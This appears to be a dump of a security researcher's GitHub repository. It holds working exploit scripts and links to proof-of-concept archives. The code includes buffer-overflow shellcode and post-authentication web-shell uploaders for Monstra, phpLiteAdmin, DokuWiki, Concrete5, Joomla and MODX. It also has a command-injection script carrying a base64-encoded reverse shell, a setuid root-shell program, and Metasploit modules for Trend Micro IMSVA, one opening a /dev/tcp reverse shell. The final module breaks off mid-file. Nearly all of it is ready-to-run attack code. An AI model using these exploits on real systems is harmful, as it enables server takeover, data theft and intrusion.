45 | shellcode += "\x49\x4b\x2d\xae\x86\x64\xc2\x1e\x66\xaf\x8b\x36\xed\x21\x79"
46 | shellcode += "\xa6\xf2\x68\xdf\x76\xf2\x9e\xc4\x6f\x7d\x61\xfb\x8f\x7f\x5e"
47 | shellcode += "\x2d\xb6\xf5\xa7\xed\x8d\x06\x92\x50\xa7\x8c\xdc\xc7\xb7\x84";
48 |
49 | endreq = " HTTP/1.1\r\n\r\n"
50 |
51 | payload = buffer + padding + ret_addr + nopsss + shellcode + endreq
52 |
53 | s.send(payload)
54 | s.close()
55 |
56 |
57 | c@kali:~/src/$
58 |
--------------------------------------------------------------------------------
/modus-0.7.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/modus-0.7.zip
--------------------------------------------------------------------------------
/monstrauuuu.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # monstrauuuu.py - postauth poc to upload shell in monstra cms 3.0.4
3 | # similar to : CVE-2018-9037
4 | #
5 | import requests
6 | import sys
7 | import re
8 |
9 | target = sys.argv[1]
10 | sess = requests.session()
11 | sesslink = target + '/monstra/admin/'
12 |
13 | logmein = {
14 | 'login':'admin',
15 | 'password':'admin',
16 | 'login_submit':'Log+In'
17 | }
18 |
19 | login_link = sesslink
20 | doLogin = sess.post(login_link, data=logmein)
21 | loginResp = doLogin.text
22 |
23 | if 'Monstra :: Administration' in loginResp:
24 | print '[+] the way I see IT, _we_ can do whatever we want'
25 |
26 | # grab csrf token to send with file
27 | tokenLink = target + '/monstra/admin/index.php?id=plugins'
28 | getToken = sess.get(tokenLink)
29 | gotTokenResp = getToken.text
30 |
31 | if 'csrf' in gotTokenResp:
32 | find_token = re.compile( 'name="csrf" value="(.*?)">' )
33 | found_token = re.search(find_token, gotTokenResp)
34 |
35 | if found_token:
36 | token = found_token.group(1)
37 | print '[+] CSRF grabbed, using %s' % ( token )
38 |
39 | # preparing upload file now
40 | fin = open('mishell.zip','rb')
41 | files = {'file': fin}
42 |
43 | shell_data = {
44 | 'csrf':token,
45 | 'file':files,
46 | 'upload_file':'Upload',
47 | }
48 |
49 | req = sess.post(tokenLink, data=shell_data, files=files)
50 | #print req.text
51 | print '[+] high, is there Mishell?'
52 |
53 | tmp1 = target + '/monstra/tmp/'
54 | req1 = requests.get(tmp1)
55 | resp1 = req1.text
56 |
57 | find_plugDir = re.compile('')
58 | found_plugDir = re.search(find_plugDir, resp1)
59 |
60 | if found_plugDir:
61 | plugin_dir = '/plugin_' + found_plugDir.group(1)
62 | print '[+] meshell found in %s' % ( plugin_dir)
63 |
64 | print '[+] Verifying...'
65 | finLink = target + '/monstra/tmp/' + plugin_dir + '/mishell.php?xx=id;w;pwd'
66 | finish = requests.get(finLink)
67 | finish_resp = finish.text
68 |
69 |
70 | print '[+] shelling Monstraaaaaaaaaauuuuuuuuuuu! \o/ \n'
71 | print finish_resp
72 |
73 | print '\no/'
74 |
75 |
76 | ##
77 | #
78 |
79 |
--------------------------------------------------------------------------------
/msaccess2010-vs-15_22.12.2017-n19.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/msaccess2010-vs-15_22.12.2017-n19.zip
--------------------------------------------------------------------------------
/mspaint-xpsp3-crash-int-poc.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/mspaint-xpsp3-crash-int-poc.ico
--------------------------------------------------------------------------------
/mspub-2010-16-part02.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/mspub-2010-16-part02.7z
--------------------------------------------------------------------------------
/mspub10-16-pocs.7z:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/mspub10-16-pocs.7z
--------------------------------------------------------------------------------
/mspub2010-vs-15_22.12.2017-n8.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/mspub2010-vs-15_22.12.2017-n8.zip
--------------------------------------------------------------------------------
/photoshop-cs3-portable.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/photoshop-cs3-portable.zip
--------------------------------------------------------------------------------
/phplightadmin.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # phplightadmin.py - phpLiteAdmin postauth RCE poc
3 | #
4 | # based on public bug + default credentials (EDB-ID: 24044)
5 | # 24.02.2019@12:38
6 | #
7 |
8 | import requests
9 | import sys
10 |
11 | target = 'http://' + sys.argv[1]
12 | full_url = target + '/dbadmin/test_db.php'
13 |
14 | login_data = {
15 | 'password':'admin',
16 | 'rememberme':'yes',
17 | 'login':'Log In'
18 | }
19 |
20 | sess = requests.session()
21 | req = sess.post(full_url, data=login_data)
22 | resp = req.text
23 |
24 | if 'Documentation' in resp:
25 | print '[+] admin user logged-in!'
26 | print '[i] preparing shell DB'
27 |
28 | createNewDbLink = target + '/dbadmin/test_db.php'
29 | createPostDB = {
30 | 'new_dbname':'shellme5.php',
31 | 'submit':'Create'
32 | }
33 |
34 | do_create = sess.post(createNewDbLink, data=createPostDB)
35 | createResp = do_create.text
36 |
37 | if 'shellme5.php' in createResp:
38 | print '[+] shell created!!'
39 |
40 | # geto to create table
41 | init_table = target + '/dbadmin/test_db.php?switchdb=/usr/databases/shellme5.php'
42 | init_req = sess.get(init_table)
43 | init_resp = init_req.text
44 |
45 | # creating table
46 | table_link = target + '/dbadmin/test_db.php?action=table_create'
47 | table_data = {
48 | 'tablename':'testing1',
49 | 'tablefields':'1',
50 | 'createtable':'Go'
51 | }
52 | do_table = sess.post(table_link, data=table_data)
53 | do_tableResp = do_table.text
54 |
55 | if 'Creating new table' in do_tableResp:
56 | print '[+] looks like table is created. so far so good!'
57 |
58 | # inject phpcode
59 | inphplink = target + '/dbadmin/test_db.php?action=table_create&confirm=1'
60 | inphplink_data = {
61 | 'tablename':'testing1',
62 | 'rows':'1',
63 | '0_field':'sasasasasasasasasasasa',
64 | '0_type':'INTEGER',
65 | '0_defaultvalue':' echo shell_exec($_GET[xxx]);?>'
66 | }
67 | inphpdo = sess.post(inphplink, data=inphplink_data)
68 | inphpdoresp = inphpdo.text
69 |
70 | if 'has been created' in inphpdoresp:
71 | print '[+] table injected; check your shell now...'
72 |
73 | verifymishell = sess.get(target + '/view.php?page=../../../../../../../../../usr/databases/shellme5.php&xxx=id')
74 | cmdresp = verifymishell.text
75 |
76 | print ']:>'
77 | print ''
78 | print cmdresp
79 | print ''
80 | print ']:>'
81 |
82 |
83 | print '\n[+] script finished.'
84 |
85 | # topa
86 | #
--------------------------------------------------------------------------------
/pma-shell.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | import urllib2, urllib, cookielib
4 | import string
5 |
6 | base = u'http://192.168.56.101/pma/phpMyAdmin-4.6.2-all-languages/'
7 | query = 'select "Load Balancer Administration System' in logmeresp:
67 | print '[+] using credentials: %s : %s' % ( our_user, our_passwd )
68 | print '[+] our timestamp: %s' % ( timestamp )
69 |
70 | print '[+] proceed.'
71 |
72 | getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
73 | dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd))
74 | getmeresp = dogetme.text
75 |
76 |
77 | payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo= | base64 -d | sh;#"
78 |
79 | #payload = "h4x;telnet 192.168.1.160 4444;#"
80 | #payload = ';id>/tmp/id.id.id'
81 | # print '[i] using payload:', payload
82 |
83 | data_req = {
84 | 'eth0' : '192.168.1.126/24',
85 | 'mtu_eth0' : '1500' + payload, # >.<
86 | 'eth1' : '',
87 | 'mtu_eth1' : '1500',
88 | 'eth2' : '',
89 | 'mtu_eth2' : '1500',
90 | 'eth3' : '',
91 | 'mtu_eth3' : '1500',
92 | 'go' : 'Configure+Interfaces'
93 | }
94 | shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
95 | shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd))
96 | shResp = shellWe.text
97 |
98 | # check sudo -l now :>
99 | print '\n\nThanks.Bye.\n'
100 |
101 |
102 |
--------------------------------------------------------------------------------
/real18-unknown-0xb4630163.0xcf34cbfe.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/real18-unknown-0xb4630163.0xcf34cbfe.zip
--------------------------------------------------------------------------------
/setuidsh.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | int main(void) {
4 | setuid(0);
5 | setgid(0);
6 | seteuid(0);
7 | setegid(0);
8 | system("cp /bin/sh /tmp/rap;chmod u+s /tmp/rap;id");
9 | }
10 |
--------------------------------------------------------------------------------
/sf_2ae2099082c3456c21190dd78bfbdfae-8680-0x0efa9000-minimized.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/sf_2ae2099082c3456c21190dd78bfbdfae-8680-0x0efa9000-minimized.zip
--------------------------------------------------------------------------------
/sf_2ae2099082c3456c21190dd78bfbdfae.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/c610/tmp/45f1ff4684366265c47182a8496a95a2c9b439d6/sf_2ae2099082c3456c21190dd78bfbdfae.zip
--------------------------------------------------------------------------------
/shel-dokuwiki.py:
--------------------------------------------------------------------------------
1 | c@kali:~/src/napalm2.2/modules$ cat shell-dokuwiki.py
2 | #!/usr/bin/env python
3 | # shell-dokuwiki.py - module to upload shell, based on previous version
4 | # created 28.04.2017. The bug ('feature') is exploitable only
5 | # when you have valid credentials.
6 | # for this proof-of-concept you'll also need host with you.r/shell.zip
7 | #
8 |
9 | import sys
10 | import re
11 | import requests
12 |
13 | print '[+] Module : dokuwiki - started.'
14 |
15 | print
16 | target = raw_input("[+] Hostname> ")
17 | logMe = target + '/doku.php?id=start&do=login§ok='
18 | print
19 |
20 | session = requests.session()
21 | login_data = dict(u='user', p='bitnami')
22 | req = session.post(logMe, data=login_data)
23 |
24 | # 2nd req:
25 | afterPage = target + '/doku.php?id=start&do=admin&page=extension&tab=install'
26 | req2 = session.get(afterPage)
27 |
28 | resp = req2.text
29 | if 'Log Out' in resp:
30 | print '[+] We are logged-in as admin. Preparing shell...'
31 |
32 |
33 | req3 = session.get(afterPage)
34 | resp3 = req3.text
35 |
36 | pattern = re.compile('')
37 | found = re.search(pattern, resp3)
38 |
39 | if found:
40 | sectok = found.group(1)
41 | print '[+] Found "sectok":' + str( sectok )
42 | print '[+] Preparing shell params to upload'
43 |
44 | data_shell = {
45 | 'sectok':sectok,
46 | 'installurl':'http://192.168.1.205/mishell.zip'
47 | }
48 | reqshell = session.post(afterPage, data=data_shell)
49 | respshell = reqshell.text
50 |
51 | md5name = re.compile(' Plugin (.*?) installed successfully ')
52 | foundmishell = re.search(md5name, respshell)
53 |
54 | if foundmishell:
55 | print '[+] Mishell name:' + str( foundmishell.group(1))
56 |
57 | shellUrl = target + '/lib/plugins/'+foundmishell.group(1)+'/mishell.php?x=id;uname -a'
58 | verify = session.get(shellUrl)
59 | vtext = verify.text
60 |
61 | print ' ',vtext
62 | print ''
63 | print '[+] Your shell should be here:', shellUrl
64 |
65 | ## can not log in
66 | else:
67 | print '[-] Can not login. Something is wrong :C'
68 |
69 |
70 | print '[+] Module : dokuwiki - finished.'
71 |
72 |
--------------------------------------------------------------------------------
/shell-concrete5.py:
--------------------------------------------------------------------------------
1 | c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
2 | #!/usr/bin/env python
3 | # shell-concrete5.py - module based on previous version
4 | # created 29.04.2017. The bug ('feature') is exploitable only
5 | # when you have valid credentials.
6 | import sys
7 | import re
8 | import requests
9 |
10 | target = raw_input("[+] Hostname> ")
11 | logMe = target + '/index.php/login'
12 | session = requests.session()
13 |
14 | initreq = session.get(logMe)
15 | initresp = initreq.text
16 |
17 | gettoken = re.compile('')
18 | found = re.search(gettoken, initresp)
19 |
20 | if found:
21 | token = found.group(1)
22 | print '[+] Found token: ' + str(token)
23 |
24 |
25 | # assuming token is valid, let's log in
26 | login_data = {
27 | 'uName':'user',
28 | 'uPassword':'bitnami',
29 | 'ccm_token':token
30 | }
31 | loglink = target + '/index.php/login/authenticate/concrete'
32 | loginreq = session.post(loglink, data=login_data)
33 |
34 | #afterlogin = target + '/index.php/dashboard/system'
35 | afterlogin = target + '/index.php/dashboard/system/files/filetypes'
36 | nextreq1 = session.get(afterlogin)
37 | nextresp1 = nextreq1.text
38 | print '[+] Cool, we\'re logged-in!'
39 | #print afterlogin
40 | #print nextresp1
41 | print '[+] We are ready to go, extension-page is available.'
42 | print ''
43 |
44 | # construct POST with new.ext
45 | newToken = re.compile('')
46 | foundToken = re.search(newToken, nextresp1)
47 |
48 | if foundToken:
49 | newOne = foundToken.group(1)
50 | print '[+] New token grabbed: ' + str(newOne)
51 |
52 | data_ext = {
53 | 'ccm_token':newOne,
54 | 'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'
55 | }
56 | datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'
57 | datareq = session.post(datalink, data=data_ext)
58 | dataresp = datareq.text
59 | nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)')
60 | newexts = re.search(nowwecan, dataresp)
61 |
62 | if newexts:
63 | print '[+] Available now: '+ newexts.group(1)
64 |
65 | print '[+] Time to upload shell...'
66 |
67 | # next token to upload request
68 | nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'
69 | tokreq3 = session.get(nextTokenUrl)
70 | tokresp3 = tokreq3.text
71 |
72 | grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')
73 | foundit = re.search(grabNextTok, tokresp3)
74 |
75 | if foundit:
76 | tokentoup = foundit.group(1)
77 | print '[+] Next token (3rd): ' + str( tokentoup )
78 |
79 | # we are logged-in; preparing req to upload shell
80 | saymyname = 'meshell3.php'
81 |
82 | fp = open(saymyname,'w')
83 | fp.write(''
116 | whereareu = re.compile(whereareutxt)
117 | foundme2 = re.search(whereareu, prepresp)
118 |
119 | if foundme2:
120 | print '[+] Shell is ready to use:'
121 | shellshere = target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'
122 | print ' ' + shellshere
123 |
124 | print '[+] "Finish him!" ;7'
125 | finish = session.get(shellshere)
126 | fintxt = finish.text
127 | print '[+] Response:'
128 | print fintxt
129 | print '\n---------------'
130 |
131 | else:
132 | print '[-] I can not upload our shell. Verify!'
133 |
134 |
135 |
--------------------------------------------------------------------------------
/shell-joomla.py:
--------------------------------------------------------------------------------
1 |
2 | c@kali:~/src/napalm2.2/modules$ cat shell-joomla.py
3 | #!/usr/bin/env python
4 | # joomla_shellup.py - small script to upload shell in Joomla
5 | #
6 | # 02.05.2017, rewrited: 27.05
7 | # -- hint --
8 | # To exploit this "feature" you will need valid credentials.'
9 | # Based on latest (3.6.5-1) version.'
10 | # Tested also on: 3.7.x
11 |
12 |
13 | import requests
14 | import re
15 |
16 | target = raw_input("[+] Hostname >> ")
17 |
18 | print '[+] Checking: ' + str(target)
19 |
20 | # initGET
21 | session = requests.session()
22 | initlink = target + '/administrator/index.php'
23 |
24 | initsend = session.get(initlink)
25 | initresp = initsend.text
26 |
27 | find_token = re.compile('')
28 | found_token = re.search(find_token, initresp)
29 |
30 | if found_token:
31 | initToken = found_token.group(1)
32 | print '[+] Found init token: ' + initToken
33 |
34 | print '[+] Preparing login request'
35 | data_login = {
36 | 'username':'user',
37 | 'passwd':'bitnami',
38 | 'lang':'',
39 | 'option':'com_login',
40 | 'task':'login',
41 | 'return':'aW5kZXgucGhw',
42 | initToken:'1'
43 | }
44 | data_link = initlink
45 | doLogin = session.post(data_link, data=data_login)
46 | loginResp = doLogin.text
47 |
48 | print '[+] At this stage we should be logged-in as an admin :)'
49 |
50 | uplink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
51 | filename = 'jsstrings.php'
52 | print '[+] File to change: ' + str(filename)
53 |
54 | getnewtoken = session.get(uplink)
55 | getresptoken = getnewtoken.text
56 |
57 | newToken = re.compile('')
58 | newFound = re.search(newToken, getresptoken)
59 |
60 | if newFound:
61 | newOneTok = newFound.group(1)
62 | print '[+] Grabbing new token from logged-in user: ' + newOneTok
63 |
64 | getjs = target+'/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA%3D'
65 | getjsreq = session.get(getjs)
66 | getjsresp = getjsreq.text
67 |
68 | # print getjsresp
69 | print '[+] Shellname: ' + filename
70 | shlink = target + '/administrator/index.php?option=com_templates&view=template&id=503&file=L2pzc3RyaW5ncy5waHA='
71 | shdata_up = {
72 | 'jform[source]':' ")
14 |
15 | print '[+] Preparing tests for ' + str(target)
16 |
17 | session = requests.session()
18 | sesslink = target + '/manager/'
19 |
20 | print '[+] Preparing login request...'
21 |
22 | data_login = {
23 | 'login_context':'mgr',
24 | 'modahsh':'',
25 | 'returnUrl':'/manager/',
26 | 'username':'user',
27 | 'password':'bitnami',
28 | 'login':'1'
29 | }
30 | data_link = sesslink
31 | doLogin = session.post(data_link, data=data_login)
32 | loginResp = doLogin.text
33 |
34 | if 'Logout' in loginResp:
35 | print '[+] We are logged in ;]'
36 |
37 | # grab HTTP_MODAUTH to build params for shelluprequest
38 | modlink = target + '/manager/?a=media/browser'
39 | getmod = session.get(modlink)
40 | getmodresp = getmod.text
41 |
42 | modfind = re.compile('auth:"(.*?)"')
43 | modfound = re.search(modfind, loginResp)
44 |
45 | if modfound:
46 | token = modfound.group(1)
47 |
48 | print '[+] Found HTTP_MODAUTH token:', token
49 |
50 | # preparing shellup req
51 | shell_data = {
52 | 'action':'browser/file/update',
53 | 'HTTP_MODAUTH':token,
54 | 'wctx':'',
55 | 'source':'1',
56 | 'file':'index.php',
57 | 'content':'')
44 | found = re.search(findit, resp2)
45 |
46 | if found:
47 | gottoken = found.group(1)
48 |
49 | print '[+] going... d0wn?'
50 |
51 | reverse_this = {
52 | '__FORM_TOKEN':gottoken,
53 | 'file':payloadfp,
54 | 'install':'Install'
55 | }
56 |
57 | print 'h4p+sh...!\n\tH@PT$h...! ;D\n'
58 | req3 = sess.post(target2, data=reverse_this,files=payloadfp)
59 | #print req3.text
60 |
61 | print '[+] done.'
62 |
63 |
64 |
65 | #
66 |
67 |
--------------------------------------------------------------------------------
/trend_micro_imsva_exec_wizard-v2.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This module requires Metasploit: http://metasploit.com/download
3 | # Current source: https://github.com/rapid7/metasploit-framework
4 | ##
5 |
6 | class MetasploitModule < Msf::Exploit::Remote
7 | Rank = ExcellentRanking
8 |
9 | include Msf::Exploit::Remote::HttpClient
10 |
11 | def initialize(info={})
12 | super(update_info(info,
13 | 'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution',
14 | 'Description' => %q{
15 | This module exploits a command injection vulnerability in the Trend Micro
16 | IMSVA product. An authenticated user can execute a terminal command under
17 | the context of the web server user which is root. Besides, default installation
18 | of IMSVA comes with a default administrator credentials.
19 |
20 | WizardSetting_sys.imss endpoint takes several user inputs and performs LAN settings.
21 | After that it use them as argument of predefined operating system command
22 | without proper sanitation. It's possible to inject arbitrary commands into it.
23 |
24 | InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
25 | },
26 | 'License' => MSF_LICENSE,
27 | 'Author' =>
28 | [
29 | 'Cody Sixteen <610code\at\gmail.com>', # found bug, rewrite poc
30 | 'Mehmet Ince ' # msf module based on pentest.blog
31 | ],
32 | 'References' =>
33 | [
34 | ['CVE', '2017-not-yet'],
35 | ['URL', 'https://code610.blogspot.com/2017/08/rce-in-trend-micro-imsva-91.html'],
36 | ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
37 | ],
38 | 'Privileged' => true,
39 | 'Payload' =>
40 | {
41 | 'Space' => 1024,
42 | 'DisableNops' => true,
43 | 'BadChars' => "\x2f\x22"
44 | },
45 | 'DefaultOptions' =>
46 | {
47 | 'SSL' => true,
48 | 'payload' => 'python/meterpreter/reverse_tcp',
49 | },
50 | 'Platform' => [''],
51 | 'Arch' => ARCH_PYTHON,
52 | 'Targets' => [ ['Automatic', {}] ],
53 | 'DisclosureDate' => 'Aug 18 2017',
54 | 'DefaultTarget' => 0
55 | ))
56 |
57 | register_options(
58 | [
59 | OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
60 | OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
61 | OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
62 | Opt::RPORT(8445)
63 | ]
64 | )
65 | end
66 |
67 | def login
68 |
69 | user = datastore['USERNAME']
70 | pass = datastore['PASSWORD']
71 |
72 | print_status("Attempting to login with #{user}:#{pass}")
73 |
74 | res = send_request_cgi({
75 | 'method' => 'POST',
76 | 'uri' => normalize_uri(target_uri.path, 'login.imss'),
77 | 'vars_post' => {
78 | 'userid' => user,
79 | 'pwdfake' => Rex::Text::encode_base64(pass)
80 | }
81 | })
82 |
83 | if res && res.body.include?("The user name or password you entered is invalid")
84 | fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
85 | end
86 |
87 | cookie = res.get_cookies
88 | if res.code == 302 && cookie.include?("JSESSIONID")
89 | jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first
90 | print_good("Authenticated as #{user}:#{pass}")
91 | return jsessionid
92 | end
93 |
94 | nil
95 | end
96 |
97 | def exploit
98 |
99 | jsessionid = login
100 |
101 | unless jsessionid
102 | fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
103 | end
104 |
105 | # Somehow java stores last visited url on session like viewstate!
106 | # Visit form before submitting it. Otherwise, it will cause a crash.
107 |
108 | res = send_request_cgi({
109 | 'method' => 'GET',
110 | 'uri' => normalize_uri(target_uri.path, 'WizardSetting_sys.imss?direct=next'),
111 | 'cookie' => "JSESSIONID=#{jsessionid}"
112 | })
113 |
114 | if !res
115 | fail_with(Failure::Unknown, 'Unable to visit WizardSetting_sys.imss')
116 | end
117 |
118 | print_status("Delivering payload...")
119 |
120 | # payload ; thanks goes to: bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html
121 | # remember to set your listening nc in 2nd window
122 | cmd = "eth0'; 0<&196;exec 196<>/dev/tcp/192.168.56.106/9999;sh <&196 >&196 2>&196 ;#"
123 |
124 | # print_status("payload: #{cmd}") ;]
125 | payl = cmd.encode
126 |
127 | # go.
128 | res = send_request_cgi({
129 | 'method' => 'POST',
130 | 'uri' => normalize_uri(target_uri.path, 'WizardSetting_sys.imss'),
131 | 'cookie' => "JSESSIONID=#{jsessionid}",
132 | 'vars_get' => {
133 | 'direct' => 'next'
134 | },
135 | 'vars_post' => {
136 | 'time_distance' => '0',
137 | 'sys_ipv4_addr_eth0' => '192.168.56.34',
138 | 'sys_ipv4_mask_eth0' => '255.255.255.0',
139 | 'sys_desname' => "#{cmd}",
140 | 'sys_hostname' => 'trend.me',
141 | 'sys_ipv4_gateway' => '192.168.56.1',
142 | 'sys_ipv4_pri_dns' => '192.168.56.1',
143 | 'sys_ipv4_sec_dns' => '',
144 | 'sys_tz_cont' => 'America',
145 | 'sys_tz_regn' => 'United+States',
146 | 'sys_tz_city' => 'New_York',
147 | }
148 | })
149 | print_status("Payload finished.")
150 | end
151 |
152 | end
153 |
--------------------------------------------------------------------------------
/trend_micro_imsva_exec_wizard.rb:
--------------------------------------------------------------------------------
1 | ##
2 | # This module requires Metasploit: http://metasploit.com/download
3 | # Current source: https://github.com/rapid7/metasploit-framework
4 | ##
5 |
6 | class MetasploitModule < Msf::Exploit::Remote
7 | Rank = ExcellentRanking
8 |
9 | include Msf::Exploit::Remote::HttpClient
10 |
11 | def initialize(info={})
12 | super(update_info(info,
13 | 'Name' => 'Trend Micro InterScan Messaging Security (Wizard) Remote Code Execution',
14 | 'Description' => %q{
15 | This module exploits a command injection vulnerability in the Trend Micro
16 | IMSVA product. An authenticated user can execute a terminal command under
17 | the context of the web server user which is root. Besides, default installation
18 | of IMSVA comes with a default administrator credentials.
19 |
20 | WizardSetting_sys.imss endpoint takes several user inputs and performs LAN settings.
21 | After that it use them as argument of predefined operating system command
22 | without proper sanitation. It's possible to inject arbitrary commands into it.
23 |
24 | InterScan Messaging Security prior to 9.1.-1600 affected by this issue.
25 | },
26 | 'License' => MSF_LICENSE,
27 | 'Author' =>
28 | [
29 | 'Cody Sixteen <610code\at\gmail.com>', # found bug, rewrite poc
30 | 'Mehmet Ince ' # msf module based on pentest.blog
31 | ],
32 | 'References' =>
33 | [
34 | ['CVE', '2017-xxx-xxxx'],
35 | ['URL', 'https://code610.blogspot.com/2017/08/rce-in-trend-micro-imsva-91.html'],
36 | ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/']
37 | ],
38 | 'Privileged' => true,
39 | 'Payload' =>
40 | {
41 | 'Space' => 1024,
42 | 'DisableNops' => true,
43 | 'BadChars' => "\x2f\x22"
44 | },
45 | 'DefaultOptions' =>
46 | {
47 | 'SSL' => true,
48 | 'payload' => 'python/meterpreter/reverse_tcp',
49 | },
50 | 'Platform' => ['python'],
51 | 'Arch' => ARCH_PYTHON,
52 | 'Targets' => [ ['Automatic', {}] ],
53 | 'DisclosureDate' => 'Aug 18 2017',
54 | 'DefaultTarget' => 0
55 | ))
56 |
57 | register_options(
58 | [
59 | OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']),
60 | OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]),
61 | OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]),
62 | Opt::RPORT(8445)
63 | ]
64 | )
65 | end
66 |
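def login
  # Authenticate to the IMSVA console with the USERNAME/PASSWORD options.
  #
  # Returns the JSESSIONID value when the appliance answers with a 302 that
  # sets the session cookie, nil otherwise. Calls fail_with (which aborts the
  # module) when no response arrives or the login page rejects the credentials.
  user = datastore['USERNAME']
  pass = datastore['PASSWORD']

  # NOTE: the credential pair is echoed into the console/log output.
  print_status("Attempting to login with #{user}:#{pass}")

  res = send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, 'login.imss'),
    'vars_post' => {
      'userid' => user,
      # The login form carries the password base64-encoded (an encoding,
      # not a protection).
      'pwdfake' => Rex::Text::encode_base64(pass)
    }
  })

  # A nil response previously fell through to res.get_cookies and raised
  # NoMethodError; report it as a connection failure instead.
  unless res
    fail_with(Failure::Unreachable, "#{peer} - No response from login.imss")
  end

  if res.body.include?("The user name or password you entered is invalid")
    fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...")
  end

  cookie = res.get_cookies
  if res.code == 302 && cookie.include?("JSESSIONID")
    # Do not require a trailing ';' after the value: include? already passed,
    # and a cookie string ending right after the value would otherwise make
    # scan return nothing and this method return nil.
    jsessionid = cookie.scan(/JSESSIONID=(\w+)/).flatten.first
    print_good("Authenticated as #{user}:#{pass}")
    return jsessionid
  end

  nil
end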
96 |
def exploit
  # Module entry point: authenticate, prime the LAN-settings wizard form, then
  # POST it with a shell metacharacter string in sys_desname, the field the
  # appliance passes unsanitised to an OS command (see the module description).

  jsessionid = login

  unless jsessionid
    fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID')
  end

  # The server keeps the last visited page in the session (viewstate-like), so
  # the form has to be fetched once before it can be submitted; posting it
  # cold makes the application crash instead.

  res = send_request_cgi({
    'method' => 'GET',
    'uri' => normalize_uri(target_uri.path, 'WizardSetting_sys.imss?direct=next'),
    'cookie' => "JSESSIONID=#{jsessionid}"
  })

  if !res
    fail_with(Failure::Unknown, 'Unable to visit WizardSetting_sys.imss')
  end

  print_status("Delivering payload...")

  # Fixed marker string sent as sys_desname: the leading quote terminates the
  # quoted argument, /bin/date's output is written to /tmp/2hi.txt, and '#'
  # discards the rest of the command line. This literal is what gets posted;
  # payl is effectively a copy of it (String#encode with no arguments).
  # Detection: quote or semicolon characters in sys_desname are never
  # legitimate input for this form; alert on them and on /tmp writes made by
  # the web server user.
  cmd = "eth0';/bin/date>/tmp/2hi.txt;#"
  payl = cmd.encode

  res = send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri.path, 'WizardSetting_sys.imss'),
    'cookie' => "JSESSIONID=#{jsessionid}",
    'vars_get' => {
      'direct' => 'next'
    },
    'vars_post' => {
      'time_distance' => '0',
      # Hard-coded LAN settings (the author's lab network) are posted
      # alongside the injected field; if the appliance applies them, a run
      # also reconfigures the target's interface.
      'sys_ipv4_addr_eth0' => '192.168.56.34',
      'sys_ipv4_mask_eth0' => '255.255.255.0',
